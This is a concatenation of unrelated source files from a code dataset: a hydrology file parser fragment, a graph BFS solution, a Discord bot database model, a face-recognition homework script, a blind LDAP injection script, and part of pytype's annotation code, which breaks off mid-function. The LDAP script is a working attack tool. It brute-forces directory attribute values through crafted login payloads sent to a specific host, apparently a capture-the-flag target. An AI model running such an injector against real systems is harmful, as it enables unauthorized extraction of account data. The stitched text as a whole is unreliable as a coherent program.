                    # NOTE(review): 'series' keeps its previous value here, so
                    # an unsupported type may reuse the last parsed profile.
                    print(f"ERROR: structure type {xs_type} not supported!")
                prof_ids = [
                    xs_id
                    for xs_id, xs_def in cross_sections.items()
                    if xs_def == def_id
                ]
                if prof_ids:
                    for prof_id in prof_ids:
                        result["cross_sections"][prof_id] = series.copy()
                else:
                    print(f"profile definition {def_id} not linked to profile-id")
    return result
def control(path):
    """Read controller definitions (control.def) from a sobek case.

    *path* is a pathlib.Path to the case directory. For every CNTL block the
    returned dict maps controller id -> {type, parameter, optional
    min_value/max_value, optional time table}.
    """
    result = dict()
    with path.joinpath("control.def").open() as control_def:
        for cntl in control_def.read().split("cntl"):
            if "CNTL" in cntl:
                cntl_def = {}
                def_id = re.search(".id '(.*)' nm.", cntl).group(1)
                cntl_def["type"] = __control_types[
                    re.search(f".ct ({__match_num}).", cntl).group(1)
                ]
                cntl_def["parameter"] = __control_param[
                    re.search(f".ca ({__match_num}).", cntl).group(1)
                ]
                if cntl_def["type"] == "PID":
                    # PID controllers carry explicit min (ui) / max (ua) bounds.
                    cntl_def["min_value"] = float(
                        re.search(f".ui ({__match_num}) ", cntl).group(1)
                    )
                    cntl_def["max_value"] = float(
                        re.search(f".ua ({__match_num}) ", cntl).group(1)
                    )
                elif cntl_def["type"] == "time":
                    # Time controllers: derive the bounds from the table rows.
                    crest_levels = []
                    for cntl_line in cntl.splitlines():
                        if "<" in cntl_line:
                            crest_levels.append(float(cntl_line.split(" ")[1]))
                    if len(crest_levels) > 0:
                        cntl_def["min_value"] = np.min(crest_levels)
                        cntl_def["max_value"] = np.max(crest_levels)
                tble_str = cntl.replace("\n", "")
                if "TBLE" in tble_str:
                    cntl_def["table"] = {}
                    # PDIN carries the interpolation function and periodicity.
                    tbl_props = re.findall("PDIN (.*) pdin", tble_str)
                    if len(tbl_props) > 0:
                        tbl_props = tbl_props[0].split()
                        cntl_def["table"]["function"] = tbl_props[0]
                        cntl_def["table"]["use_periodicity"] = bool(int(tbl_props[1]))
                        # BUGFIX: use_periodicity was just converted to bool,
                        # so the original comparison with the string "1" was
                        # always False and the periodicity was never stored.
                        if cntl_def["table"]["use_periodicity"]:
                            cntl_def["table"]["periodicity"] = tbl_props[2]
                    # Parse the timestamp/value table into a pandas Series.
                    tble_list = (
                        re.search(r".*TBLE(.*)<tble.", tble_str).group(1).split("<")
                    )
                    date_time = [
                        pd.to_datetime(row.split()[0], format="'%Y/%m/%d;%H:%M:%S'")
                        for row in tble_list
                    ]
                    values = [float(row.split()[1]) for row in tble_list]
                    cntl_def["table"]["data"] = pd.Series(data=values, index=date_time)
                result[def_id] = cntl_def
    return result
def boundaries(path):
    """Read flow boundaries (boundary.dat) from a sobek case.

    Returns {"flow": DataFrame} indexed by boundary id, with a TYPE column
    ("waterlevel" or "discharge") decoded from the FLBO records.
    """
    flow = {}
    with path.joinpath("boundary.dat").open() as boundary_dat:
        for line in boundary_dat:
            if not re.match("FLBO", line):
                continue
            ident = __between(line, "id", "st").replace(" ", "").replace("'", "")
            type_code = re.search(".ty ([0-9]).", line).group(1)
            flow[ident] = {"TYPE": __flow_boundary_types[type_code]}
    return {"flow": pd.DataFrame.from_dict(flow, orient="index")}
| d2hydro/sobek_kisters | sobek/read.py | read.py | py | 20,927 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "shapely.geometry.LineString",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "shapely.geometry.Point",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "shapely.geometry.Point",
"line_number": 49,
"usage_type": "call"
},
{
"api_nam... |
# Baekjoon 1012 - Organic Cabbage (count connected components with BFS)
import sys, collections
T = int(sys.stdin.readline())  # number of test cases
tc = 0  # index of the test case currently being processed
def bfs(start, M, N):
    """Flood-fill one connected patch of True cells in the global grid.

    Marks every cell reachable from `start` (4-directional moves) in the
    module-level `visited` grid; reads the module-level `arr` grid.

    Args:
        start: [row, col] starting cell.
        M: number of rows in the grid.
        N: number of columns in the grid.
    """
    global visited
    offsets = ((-1, 0), (1, 0), (0, -1), (0, 1))  # up, down, left, right
    queue = collections.deque([start])
    while queue:
        r, c = queue.popleft()
        if visited[r][c]:
            continue
        visited[r][c] = True
        for dr, dc in offsets:
            nr, nc = r + dr, c + dc
            if 0 <= nr < M and 0 <= nc < N and arr[nr][nc] and not visited[nr][nc]:
                queue.append([nr, nc])
# Process each test case: build the cabbage grid, then count connected
# components by launching a BFS from every unvisited cabbage cell.
while tc < T:
    M, N, K = map(int ,sys.stdin.readline().split(" "))  # rows, cols, cabbage count
    arr = [[False for _ in range(N)] for _ in range(M)]      # True where a cabbage sits
    visited = [[False for _ in range(N)] for _ in range(M)]  # BFS bookkeeping
    answer = 0  # number of connected cabbage patches (worms needed)
    for _ in range(K):
        i, j = map(int ,sys.stdin.readline().split(" "))
        arr[i][j] = True
    for i in range(M):
        for j in range(N):
            # Each unvisited cabbage cell starts a new patch.
            if arr[i][j] and not visited[i][j]:
                answer += 1
                bfs([i,j], M, N)
    print(answer)
    tc += 1
{
"api_name": "sys.stdin.readline",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.stdin.readline"... |
20678800215 | from __future__ import annotations
from typing import List, Optional
from sqlalchemy import BigInteger, Column, Integer, String
from pie.database import database, session
class Seeking(database.base):
    """One 'seeking' advertisement posted by a user in a guild channel."""

    __tablename__ = "fun_seeking_seeking"

    # Surrogate primary key.
    idx = Column(Integer, primary_key=True, autoincrement=True)
    # Discord snowflakes identifying where the message lives.
    guild_id = Column(BigInteger)
    channel_id = Column(BigInteger, default=None)
    message_id = Column(BigInteger, unique=True)
    user_id = Column(BigInteger)
    # Free-form text of the advertisement.
    text = Column(String)

    @staticmethod
    def add(
        guild_id: int, channel_id: int, message_id: int, user_id: int, text: str
    ) -> Seeking:
        """Insert a new seeking entry and return the persisted row."""
        query = Seeking(
            guild_id=guild_id,
            channel_id=channel_id,
            message_id=message_id,
            user_id=user_id,
            text=text,
        )
        session.add(query)
        session.commit()
        return query

    @staticmethod
    def get(guild_id: int, channel_id: int, item_id: int) -> Optional[Seeking]:
        """Return the entry with the given idx in the channel, or None."""
        return (
            session.query(Seeking)
            .filter_by(guild_id=guild_id, channel_id=channel_id, idx=item_id)
            .one_or_none()
        )

    @staticmethod
    def remove(guild_id: int, channel_id: int, item_id: int) -> int:
        """Delete the entry with the given idx; return the number of rows removed."""
        query = (
            session.query(Seeking)
            .filter_by(guild_id=guild_id, channel_id=channel_id, idx=item_id)
            .delete()
        )
        session.commit()
        return query

    @staticmethod
    def get_all(guild_id: int, channel_id: int = None) -> List[Seeking]:
        """List all entries in a guild, optionally restricted to one channel."""
        if not channel_id:
            return session.query(Seeking).filter_by(guild_id=guild_id).all()
        return (
            session.query(Seeking)
            .filter_by(guild_id=guild_id, channel_id=channel_id)
            .all()
        )

    def __repr__(self) -> str:
        return (
            f"<Seeking idx='{self.idx}' guild_id='{self.guild_id}' "
            f"channel_id='{self.channel_id}' message_id='{self.message_id}' "
            f"user_id='{self.user_id}' text='{self.text}'>"
        )

    def dump(self) -> dict:
        """Serialize the row into a plain dict (e.g. for backups)."""
        return {
            "guild_id": self.guild_id,
            "channel_id": self.channel_id,
            "message_id": self.message_id,
            "user_id": self.user_id,
            "text": self.text,
        }
| pumpkin-py/pumpkin-fun | seeking/database.py | database.py | py | 2,317 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pie.database.database.base",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "pie.database.database",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 13,
"usage_type": "call"
},
{
"api_name"... |
44258229341 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
import tensorflow.keras.backend as K
# from keras.models import load_model
from tensorflow.keras.models import load_model
from os import listdir
from os.path import isdir
from PIL import Image
import numpy as np
from numpy import load
from numpy import expand_dims
from numpy import asarray
from sklearn.metrics import accuracy_score, pairwise_distances
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import Normalizer
from sklearn.svm import SVC
from tqdm import tqdm
def extract_face(filename, required_size=(160, 160)):
    """Load an image file and return its pixels as an RGB array.

    NOTE(review): despite the name, no face detection or resizing happens
    here — ``required_size`` is unused and the whole image is returned.
    Presumably the dataset images are already cropped 160x160 faces; confirm.

    Inputs:
    - filename: path of a file to be converted
    Returns:
    - array of image pixels with RGB channels
    """
    rgb_image = Image.open(filename).convert('RGB')
    return asarray(rgb_image)
def load_faces(directory):
    """Collect face arrays for every image file directly inside a directory.

    Inputs:
    - directory: path (with trailing slash) of one person's face images
    Returns:
    - list of face pixel arrays, one per file
    """
    return [extract_face(directory + entry) for entry in listdir(directory)]
def load_dataset(directory):
    """Load faces and labels from one subdirectory per class.

    Inputs:
    - directory: path containing one subdir per person (train or test root)
    Returns:
    - asarray(X): face image arrays
    - asarray(y): class label per face (the subdir name)
    """
    X, y = [], []
    for subdir in listdir(directory):
        path = directory + subdir + '/'
        # Skip plain files and hidden entries such as .DS_Store.
        if not isdir(path) or subdir.startswith('.'):
            continue
        faces = load_faces(path)
        X.extend(faces)
        y.extend([subdir] * len(faces))
    return asarray(X), asarray(y)
def get_embedding(model, face_pixels):
    """Standardize one face image and run it through the embedding model.

    Inputs:
    - model: facenet model producing a 128-dim embedding per face
    - face_pixels: image array of a single face
    Returns:
    - the embedding vector for the face
    """
    # Standardize pixel values across channels before inference.
    pixels = face_pixels.astype('float32')
    pixels = (pixels - pixels.mean()) / pixels.std()
    # The model expects a batch dimension; predict and unwrap the single row.
    batch = expand_dims(pixels, axis=0)
    return model.predict(batch)[0]
def contrastive_loss(y, emb1, emb2, margin=1.0):
    """
    Compute the contrastive loss for two embeddings.

    Inputs:
    - y: 1 if emb1 and emb2 are the same person's face, 0 if not
    - emb1: embedding of a face
    - emb2: embedding of a face
    - margin: minimum distance enforced between different-identity embeddings
    Returns:
    - loss: y * d^2 + (1 - y) * max(margin - d, 0)^2 with d = ||emb1 - emb2||
    """
    #### Question (b): your implementation starts here (don't delete this line)
    # BUG FIX: removed a stray debug print of the embedding shapes that ran on
    # every single loss evaluation.
    y_pred = tf.linalg.norm(emb1 - emb2)
    y = tf.cast(y, y_pred.dtype)
    loss = y * tf.math.square(y_pred) + (1.0 - y) * tf.math.square(
        tf.math.maximum(margin - y_pred, 0.0)
    )
    #### Question (b): your implementation ends here (don't delete this line)
    return loss
def triplet_loss(anchor, emb1, emb2, margin=1.0):
    """
    Compute the triplet loss for an anchor, a positive and a negative face.

    Inputs:
    - anchor: embedding of the reference face
    - emb1: embedding of a positive face (same identity as anchor)
    - emb2: embedding of a negative face (different identity)
    - margin: required gap between positive and negative squared distances
    Returns:
    - loss
    """
    #### Question (c): your implementation starts here (don't delete this line)
    pos_sq_dist = tf.reduce_sum(tf.square(anchor - emb1))
    neg_sq_dist = tf.reduce_sum(tf.square(anchor - emb2))
    hinge = tf.maximum(0., margin + pos_sq_dist - neg_sq_dist)
    loss = tf.reduce_mean(hinge)
    #### Question (c): your implementation ends here (don't delete this line)
    return loss
def main():
    """Train and evaluate an SVM face classifier on FaceNet embeddings.

    Loads the LFW train/val image folders, embeds every face with the
    pre-trained FaceNet model, fits an SVM on the L2-normalized embeddings,
    reports train/test accuracy, and sanity-checks the two loss functions
    on sample embeddings.
    """
    # load train dataset
    trainX, trainy = load_dataset('./LFW/train/')
    print(trainX.shape, trainy.shape)
    # load test dataset
    testX, testy = load_dataset('./LFW/val/')
    print(testX.shape, testy.shape)
    # load the pre-trained facenet model
    model = load_model('facenet_keras.h5', compile=False)
    # convert each face in the train set to an embedding
    print('[INFO] calculating train data embedding ...')
    newTrainX = list()
    for face_pixels in tqdm(trainX):
        embedding = get_embedding(model, face_pixels)
        newTrainX.append(embedding)
    trainX = asarray(newTrainX)
    # convert each face in the test set to an embedding
    print('[INFO] calculating test data embedding ...')
    newTestX = list()
    for face_pixels in tqdm(testX):
        embedding = get_embedding(model, face_pixels)
        newTestX.append(embedding)
    testX = asarray(newTestX)
    # normalize input vectors
    in_encoder = Normalizer(norm='l2')
    trainX = in_encoder.transform(trainX)
    testX = in_encoder.transform(testX)
    # label encode targets
    out_encoder = LabelEncoder()
    out_encoder.fit(trainy)
    trainy = out_encoder.transform(trainy)
    testy = out_encoder.transform(testy)
    '''
    Generate linear classifier model which name is 'model'
    '''
    #### Question (a): your implementation starts here (don't delete this line)
    # NOTE: rebinding `model` here discards the FaceNet model, which is no
    # longer needed once the embeddings above are computed.
    model = SVC(gamma='auto', verbose=True)
    #### Question (a): your implementation ends here (don't delete this line)
    # train
    print('[INFO] model is training ...')
    model.fit(trainX, trainy)
    print('[INFO] training is done.')
    # predict
    yhat_train = model.predict(trainX)
    yhat_test = model.predict(testX)
    # score
    score_train = accuracy_score(trainy, yhat_train)
    score_test = accuracy_score(testy, yhat_test)
    # summarize
    print('Accuracy: train=%.3f, test=%.3f' % (score_train*100, score_test*100))
    # loss function test with sample data
    # BUG FIX: the original format strings read '...: f' with no '%' before
    # the 'f', so each of these lines raised
    # "TypeError: not all arguments converted during string formatting".
    print('Contrastive loss for same face: %f' % (contrastive_loss(1, trainX[0], trainX[1])))
    print('Contrastive loss for different face: %f' % (contrastive_loss(0, trainX[0], trainX[100])))
    print('Triplet loss: %f' % (triplet_loss(trainX[0], trainX[0], trainX[100])))


if __name__ == '__main__':
    main()
| vgthengane/pytorch-cv-models | h4_face.py | h4_face.py | py | 6,258 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image.open",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "numpy.asarray",
"line_num... |
7004766354 | #!/usr/bin/python
from bs4 import BeautifulSoup
import requests
import time
import sys
import urllib
from itertools import chain
import argparse
# Target endpoints of the machine under test.
url = "http://10.10.10.122/login.php"
startUrl = "http://10.10.10.122/"
# Route traffic through a local intercepting proxy (e.g. Burp).
proxyValues = {'http': 'http://127.0.0.1:8080'}
# Delay between requests, in seconds, to avoid hammering the target.
SLEEP_VALUE = 3
# ASCII code ranges used to brute-force attribute values character by character.
lower_letters = range(97,123)  # 'a'-'z'
upper_letters = range(65,91)   # 'A'-'Z'
number_set = range(48,58)      # '0'-'9'
#r= requests.get(url)
#sessionCookie = r.cookies
#print (r.text)
testRange = range(107,109)  # tiny range ('k'-'l') handy for quick dry runs
#print ("*** Sleeping for %d seconds***" % SLEEPVALUE)
#time.sleep(SLEEPVALUE) #sleep little baby
def findLDAPAttribute(sessionID, lineList, pl,fullRange):
    """Brute-force LDAP attribute values one character at a time.

    For every attribute name in lineList, repeatedly POSTs login payloads
    built from `pl` (a format template taking the attribute name and a
    partial value followed by a '*' wildcard) and extends the recovered
    token whenever the response page indicates a blind-injection hit.

    Args:
        sessionID: PHPSESSID cookie value of an active session.
        lineList: attribute names to probe, one per entry.
        pl: payload template, e.g. '*)({0}={1}'.
        fullRange: iterable of ASCII codes to try at each position.
            NOTE(review): if this is an itertools.chain it is exhausted
            after the first pass — confirm callers pass a reusable range.

    Returns:
        dict mapping each attribute that yielded data to its recovered value.
    """
    failedList = []           # attributes whose request raised an exception
    foundAttributeDict = {}   # attribute -> fully recovered token
    foundAttribute = ''
    foundValue =''
    #fullRange = chain(lower_letters)
    # Mimic a real browser session so requests blend in with normal traffic.
    headerValues = {'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
                    'Accept' :'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-Language': 'en-US,en;q=0.5',
                    'Accept-Encoding': 'gzip, deflate',
                    'Referer': 'http://10.10.10.122/login.php',
                    'Connection': 'close'}
    #iterate through attributes
    for i in lineList:
        token = ''  # value recovered so far for attribute i
        #payload = 'ldapuser)(|(' + i +'=*)'
        #payload = pre + i + post
        giveUp = False;
        fullIteration = 0
        while (giveUp!= True):
            # Remember the token length so a full pass with no new character
            # can be detected below.
            fullIteration=len(token)
            for character in fullRange:
                payload = pl.format(i,token+chr(character)+'*')
                #double url encoding is needed
                print ("trying payload %s" % payload)
                payload = urllib.parse.quote_plus(payload)
                reqdata = {'inputUsername' : payload, 'inputOTP': '123456'}
                with requests.session() as s:
                    try:
                        s.keep_alive = False
                        r = s.post(url,cookies={'PHPSESSID':sessionID}, data=reqdata, headers=headerValues, proxies=proxyValues)
                        #non proxy -
                        #r = s.post(url,cookies={'PHPSESSID':sessionID}, data=reqdata, headers=headerValues)
                    except Exception as e:
                        # Best-effort: record the failure and keep probing.
                        print(repr(e))
                        failedList.append(i)
                    finally:
                        s.close()
                #looking for result
                soup = BeautifulSoup(r.text, 'html.parser')
                resultSet = soup.findAll( "div", {"class":"col-sm-10"})
                if len(resultSet[0].text) > 1:
                    #if we end up with the failed double url decoding in result, then we need to ignore it
                    if "%" not in resultSet[0].text:
                        #"Cannot login" is the indicator for the blind injection
                        #add the current character to our token
                        token += chr(character)
                        print ("Found a value in attribute %s of value %s" % (i,token))
                        foundAttribute = i
                        foundValue = resultSet[0].text
                else:
                    print ("no value for %s on length %d with length %d" % (i,len(resultSet[0].text), len(r.text) ))
                time.sleep(SLEEP_VALUE)
            #if the length of the token has not increased, then we're out of options..
            if (len(token) == fullIteration):
                giveUp=True #move to the next attribute
                print ("We are at %s" %token)
        if len(token) > 0:
            foundAttributeDict.update({foundAttribute:token})
            print ("All done! values are %s : %s" % (foundAttribute,token))
            finalVal = "Attribute is [" + foundAttribute + "] with value [" + token +"]"
    if len (failedList) > 0:
        print ("We failed on attributes " + str(failedList))
    for keys,value in foundAttributeDict.items():
        print (keys, value)
    return foundAttributeDict
def main():
    """Parse CLI arguments and launch the blind LDAP attribute search."""
    parser = argparse.ArgumentParser(description='blind ldap injector')
    parser.add_argument('--option', '-o', help="1-Upper,2-Lower,3-Numbers,4-LowerNumbers,5-all",
                        required=True, choices={1, 2, 3, 4, 5}, type=int)
    parser.add_argument('--attribFile', '-f', help="attribute file", required=True)
    parser.add_argument('--sessionID', '-s', help="phpsession id", required=True)
    args = parser.parse_args()
    sessionID = args.sessionID
    filename = args.attribFile
    options = args.option
    # One attribute name per line; strip trailing newlines.
    with open(filename, 'r') as f:
        lineList = [line.rstrip() for line in f]
    print("Starting with SessionID %s Filename %s Option - %d" % (sessionID, filename, options))
    # Map the numeric CLI option to the character search space.
    charsets = {
        1: upper_letters,
        2: lower_letters,
        3: number_set,
        4: chain(lower_letters, number_set),
        5: chain(upper_letters, lower_letters, number_set),
    }
    fullRange = charsets[options]
    print(fullRange)
    # First a wildcard-anchored payload, then one anchored on the known
    # 'ldapuser' account.
    for payload in ('*)({0}={1}', 'ldapuser)({0}={1}'):
        testcase = findLDAPAttribute(sessionID, lineList, payload, fullRange)
# Script entry point: exit with main()'s return code.
if __name__ == '__main__':
    sys.exit(main())
# Leftover debug snippets from development:
#print ("Message is of length %d and is [%s]" % (len(resultSet[0].text), resultSet[0].text))
#print (r.text)
| nutty-guineapig/htb-pub | CTF/blindLDAPInjector.py | blindLDAPInjector.py | py | 5,035 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.parse.quote_plus",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "urllib.parse",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "requests.session",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "bs4.Beauti... |
28890288771 | """Constructs related to type annotations."""
import dataclasses
import logging
import typing
from typing import Mapping, Optional, Set, Tuple, Type, Union as _Union
from pytype import datatypes
from pytype.abstract import _base
from pytype.abstract import _classes
from pytype.abstract import _instance_base
from pytype.abstract import abstract_utils
from pytype.abstract import function
from pytype.abstract import mixin
from pytype.pytd import pytd_utils
log = logging.getLogger(__name__)
def _get_container_type_key(container):
    # Best-effort key: use the container's get_type_key() when available;
    # objects without the method are keyed by the object itself.
    try:
        return container.get_type_key()
    except AttributeError:
        return container
class AnnotationClass(_instance_base.SimpleValue, mixin.HasSlots):
    """Base class of annotations that can be parameterized."""

    def __init__(self, name, ctx):
        super().__init__(name, ctx)
        mixin.HasSlots.init_mixin(self)
        # Route X[...] subscripting through getitem_slot.
        self.set_native_slot("__getitem__", self.getitem_slot)

    def getitem_slot(self, node, slice_var):
        """Custom __getitem__ implementation."""
        slice_content = abstract_utils.maybe_extract_tuple(slice_var)
        inner, ellipses = self._build_inner(slice_content)
        value = self._build_value(node, tuple(inner), ellipses)
        return node, value.to_variable(node)

    def _build_inner(self, slice_content):
        """Build the list of parameters.

        Args:
          slice_content: The iterable of variables to extract parameters from.

        Returns:
          A tuple of a list of parameters and a set of indices at which an ellipsis
          was replaced with Any.
        """
        inner = []
        ellipses = set()
        for var in slice_content:
            if len(var.bindings) > 1:
                # An ambiguous parameter (multiple bindings) becomes Any.
                self.ctx.errorlog.ambiguous_annotation(self.ctx.vm.frames, var.data)
                inner.append(self.ctx.convert.unsolvable)
            else:
                val = var.bindings[0].data
                if val is self.ctx.convert.ellipsis:
                    # Ellipses are allowed only in special cases, so turn them into Any
                    # but record the indices so we can check if they're legal.
                    ellipses.add(len(inner))
                    inner.append(self.ctx.convert.unsolvable)
                else:
                    inner.append(val)
        return inner, ellipses

    def _build_value(self, node, inner, ellipses):
        # Subclasses construct the actual annotation value from the parameters.
        raise NotImplementedError(self.__class__.__name__)

    def __repr__(self):
        return f"AnnotationClass({self.name})"

    def _get_class(self):
        return self.ctx.convert.type_type
class AnnotationContainer(AnnotationClass):
    """Implementation of X[...] for annotations."""

    def __init__(self, name, ctx, base_cls):
        super().__init__(name, ctx)
        # The class being parameterized, e.g. `list` in `list[int]`.
        self.base_cls = base_cls

    def __repr__(self):
        return f"AnnotationContainer({self.name})"

    def _sub_annotation(
        self, annot: _base.BaseValue, subst: Mapping[str, _base.BaseValue],
        seen: Optional[Set[_base.BaseValue]] = None,
    ) -> _base.BaseValue:
        """Apply type parameter substitutions to an annotation."""
        # This is very similar to annotation_utils.sub_one_annotation, but a couple
        # differences make it more convenient to maintain two separate methods:
        # - subst here is a str->BaseValue mapping rather than str->Variable, and it
        #   would be wasteful to create variables just to match sub_one_annotation's
        #   expected input type.
        # - subst contains the type to be substituted in, not an instance of it.
        #   Again, instantiating the type just to later get the type of the instance
        #   is unnecessary extra work.
        if seen is None:
            seen = set()
        if annot in seen:
            # Recursive annotation: cut the cycle with Any.
            return annot.ctx.convert.unsolvable
        seen = seen | {annot}
        if isinstance(annot, TypeParameter):
            if annot.full_name in subst:
                return subst[annot.full_name]
            else:
                return self.ctx.convert.unsolvable
        elif isinstance(annot, mixin.NestedAnnotation):
            inner_types = [(key, self._sub_annotation(val, subst, seen))
                           for key, val in annot.get_inner_types()]
            return annot.replace(inner_types)
        return annot

    def _get_value_info(
        self, inner, ellipses, allowed_ellipses=frozenset()
    ) -> Tuple[Tuple[_Union[int, str], ...], Tuple[_base.BaseValue, ...],
               Type[_classes.ParameterizedClass]]:
        """Get information about the container's inner values.

        Args:
          inner: The list of parameters from _build_inner().
          ellipses: The set of ellipsis indices from _build_inner().
          allowed_ellipses: Optionally, a set of indices at which ellipses are
            allowed. If omitted, ellipses are assumed to be never allowed.

        Returns:
          A tuple of the template, the parameters, and the container class.
        """
        if self.base_cls.full_name == "typing.Protocol":
            return abstract_utils.build_generic_template(inner, self) + (
                _classes.ParameterizedClass,)  # pytype: disable=bad-return-type
        if isinstance(self.base_cls, _classes.TupleClass):
            template = tuple(range(self.base_cls.tuple_length))
        elif isinstance(self.base_cls, _classes.CallableClass):
            template = tuple(range(self.base_cls.num_args)) + (abstract_utils.RET,)
        else:
            template = tuple(t.name for t in self.base_cls.template)
        self.ctx.errorlog.invalid_ellipses(self.ctx.vm.frames,
                                           ellipses - allowed_ellipses, self.name)
        last_index = len(inner) - 1
        if last_index and last_index in ellipses and len(inner) > len(template):
            # Even if an ellipsis is not allowed at this position, strip it off so
            # that we report only one error for something like 'List[int, ...]'
            inner = inner[:-1]
        if isinstance(self.base_cls, _classes.ParameterizedClass):
            # We're dealing with a generic type alias, e.g.:
            #   X = Dict[T, str]
            #   def f(x: X[int]): ...
            # We construct `inner` using both the new inner values and the ones
            # already in X, to end up with a final result of:
            #   template=(_K, _V)
            #   inner=(int, str)
            new_inner = []
            inner_idx = 0
            subst = {}
            # Note that we ignore any missing or extra values in inner for now; the
            # problem will be reported later by _validate_inner.
            for k in template:
                v = self.base_cls.formal_type_parameters[k]
                if v.formal:
                    params = self.ctx.annotation_utils.get_type_parameters(v)
                    for param in params:
                        # If there are too few parameters, we ignore the problem for now;
                        # it'll be reported when _build_value checks that the lengths of
                        # template and inner match.
                        if param.full_name not in subst and inner_idx < len(inner):
                            subst[param.full_name] = inner[inner_idx]
                            inner_idx += 1
                    new_inner.append(self._sub_annotation(v, subst))
                else:
                    new_inner.append(v)
            inner = tuple(new_inner)
            if isinstance(self.base_cls, _classes.TupleClass):
                template += (abstract_utils.T,)
                inner += (self.ctx.convert.merge_values(inner),)
            elif isinstance(self.base_cls, _classes.CallableClass):
                template = template[:-1] + (abstract_utils.ARGS,) + template[-1:]
                args = inner[:-1]
                inner = args + (self.ctx.convert.merge_values(args),) + inner[-1:]
            abstract_class = type(self.base_cls)
        else:
            abstract_class = _classes.ParameterizedClass
        return template, inner, abstract_class

    def _validate_inner(self, template, inner, raw_inner):
        """Check that the passed inner values are valid for the given template."""
        if (isinstance(self.base_cls, _classes.ParameterizedClass) and
                not abstract_utils.is_generic_protocol(self.base_cls)):
            # For a generic type alias, we check that the number of typevars in the
            # alias matches the number of raw parameters provided.
            template_length = raw_template_length = len(
                set(self.ctx.annotation_utils.get_type_parameters(self.base_cls)))
            inner_length = len(raw_inner)
            base_cls = self.base_cls.base_cls
        else:
            # In all other cases, we check that the final template length and
            # parameter count match, after any adjustments like flattening the inner
            # argument list in a Callable.
            template_length = len(template)
            raw_template_length = len(self.base_cls.template)
            inner_length = len(inner)
            base_cls = self.base_cls
        if inner_length != template_length:
            if not template:
                self.ctx.errorlog.not_indexable(
                    self.ctx.vm.frames, base_cls.name, generic_warning=True)
            else:
                # Use the unprocessed values of `template` and `inner` so that the error
                # message matches what the user sees.
                if isinstance(self.base_cls, _classes.ParameterizedClass):
                    error_template = None
                else:
                    error_template = (t.name for t in base_cls.template)
                self.ctx.errorlog.wrong_annotation_parameter_count(
                    self.ctx.vm.frames, self.base_cls, raw_inner, raw_template_length,
                    error_template)
        else:
            if len(inner) == 1:
                val, = inner
                # It's a common mistake to index a container class rather than an
                # instance (e.g., list[0]).
                # We only check the "int" case, since string literals are allowed for
                # late annotations.
                if (isinstance(val, _instance_base.Instance) and
                        val.cls == self.ctx.convert.int_type):
                    # Don't report this error again.
                    inner = (self.ctx.convert.unsolvable,)
                    self.ctx.errorlog.not_indexable(self.ctx.vm.frames, self.name)
        # Check for a misused Final annotation
        if any(isinstance(val, FinalAnnotation) for val in inner):
            self.ctx.errorlog.invalid_final_type(self.ctx.vm.frames)
            inner = [val.annotation if isinstance(val, FinalAnnotation) else val
                     for val in inner]
        return inner

    def _build_value(self, node, inner, ellipses):
        if self.base_cls.is_late_annotation():
            # A parameterized LateAnnotation should be converted to another
            # LateAnnotation to delay evaluation until the first late annotation is
            # resolved. We don't want to create a ParameterizedClass immediately
            # because (1) ParameterizedClass expects its base_cls to be a
            # class_mixin.Class, and (2) we have to postpone error-checking anyway so
            # we might as well postpone the entire evaluation.
            printed_params = []
            added_typing_imports = set()
            for i, param in enumerate(inner):
                if i in ellipses:
                    printed_params.append("...")
                else:
                    typ = param.get_instance_type(node)
                    annot, typing_imports = pytd_utils.MakeTypeAnnotation(typ)
                    printed_params.append(annot)
                    added_typing_imports.update(typing_imports)
            expr = f"{self.base_cls.expr}[{', '.join(printed_params)}]"
            annot = LateAnnotation(expr, self.base_cls.stack, self.ctx,
                                   typing_imports=added_typing_imports)
            self.ctx.vm.late_annotations[self.base_cls.expr].append(annot)
            return annot
        template, processed_inner, abstract_class = self._get_value_info(
            inner, ellipses)
        if isinstance(self.base_cls, _classes.ParameterizedClass):
            base_cls = self.base_cls.base_cls
        else:
            base_cls = self.base_cls
        if base_cls.full_name in ("typing.Generic", "typing.Protocol"):
            # Generic is unique in that parameterizing it defines a new template;
            # usually, the parameterized class inherits the base class's template.
            # Protocol[T, ...] is a shorthand for Protocol, Generic[T, ...].
            template_params = [
                param.with_scope(base_cls.full_name)
                for param in typing.cast(Tuple[TypeParameter, ...], processed_inner)]
        else:
            template_params = None
        processed_inner = self._validate_inner(template, processed_inner, inner)
        params = {
            name: (processed_inner[i]
                   if i < len(processed_inner) else self.ctx.convert.unsolvable)
            for i, name in enumerate(template)
        }
        # Check if the concrete types match the type parameters.
        if base_cls.template:
            processed_params = self.ctx.annotation_utils.convert_class_annotations(
                node, params)
            for formal_param in base_cls.template:
                root_node = self.ctx.root_node
                param_value = processed_params[formal_param.name]
                if (isinstance(formal_param, TypeParameter) and
                        not formal_param.is_generic() and
                        isinstance(param_value, TypeParameter)):
                    if formal_param.name == param_value.name:
                        # We don't need to check if a TypeParameter matches itself.
                        continue
                    else:
                        actual = param_value.instantiate(
                            root_node, container=abstract_utils.DUMMY_CONTAINER)
                elif param_value.is_concrete and isinstance(param_value.pyval, str):
                    # A string parameter is a late annotation to be resolved later.
                    expr = param_value.pyval
                    annot = LateAnnotation(expr, self.ctx.vm.frames, self.ctx)
                    base = expr.split("[", 1)[0]
